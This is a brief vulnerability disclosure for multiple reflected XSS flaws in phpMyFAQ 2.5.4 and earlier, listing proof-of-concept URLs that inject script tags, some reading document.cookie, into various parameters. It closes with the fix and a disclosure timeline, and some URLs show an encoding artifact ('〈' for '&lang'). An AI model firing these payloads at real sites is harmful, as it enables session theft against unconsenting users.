phpMyFAQ <= 2.5.4 Multiple XSS Vulnerabilities

############ OVERVIEW ############ phpMyFAQ 2.5 is a multilingual, completely database-driven FAQ-system. ###################### PoC ###################### http://server/phpmyfaq/index.php?action=sitemap〈=en"><script>alert(1)</script> http://server/phpmyfaq/index.php?search=hello"><script>alert(document.cookie)</script>&action=search http://server/phpmyfaq/index.php?action=artikel&cat=1&id=1&artlang=en&highlight=you"><script>alert(1)</script> http://server/phpmyfaq/index.php?action=artikel&cat=1&id=1&artlang=en"><script>alert(1)</script> http://server/phpmyfaq/index.php?action=sitemap&letter=W〈=en"><script>alert(1)</script> http://server/phpmyfaq/index.php?action=sitemap&letter=W"><script>alert(1)</script>〈=en http://server/phpmyfaq/index.php?sid=7〈=en"><script>alert(document.cookie)</script>&action=show&cat=1 http://server/phpmyfaq/index.php?sid=7〈=en&action=show&cat=1"><script>alert(document.cookie)</script> http://server/phpmyfaq/index.php?action=search&tagging_id=1"><script>alert(1)</script> http://server/phpmyfaq/index.php?action=news&newsid=1&newslang=en"><script>alert(document.cookie)</script> http://server/phpmyfaq/index.php?action=send2friend&cat=1&id=1&artlang=en"><script>alert(1)</script> http://server/phpmyfaq/index.php?action=send2friend&cat=1"><script>alert(1)</script>&id=1&artlang=en http://server/phpmyfaq/index.php?action=send2friend&cat=1&id=1"><script>alert(1)</script>&artlang=en http://server/phpmyfaq/index.php?action=translate&cat=1&id=1&srclang=en"><script>alert(1)</script> http://server/phpmyfaq/index.php?action=translate&cat=1&id=1"><script>alert(1)</script>&srclang=en http://server/phpmyfaq/index.php?action=translate&cat=1"><script>alert(1)</script>&id=1&srclang=en http://server/phpmyfaq/index.php?action=add&question=1&cat=1"><script>alert(1)</script> http://server/phpmyfaq/index.php?action=add&question=1"><script>alert(1)</script>&cat=1 ############# Reference ############# http://www.phpmyfaq.de/advisory_2009-12-01.php ############# Workaround ############# Upgrade to phpMyFAQ 2.5.5. Download: http://www.phpmyfaq.de/download.php ############ TimeLine ############ Bug discovered : 05/11/2009 Informed Vendor : 05/11/2009 Vendor releases new version : 02/12/2009 Public Disclosure : 02/12/2009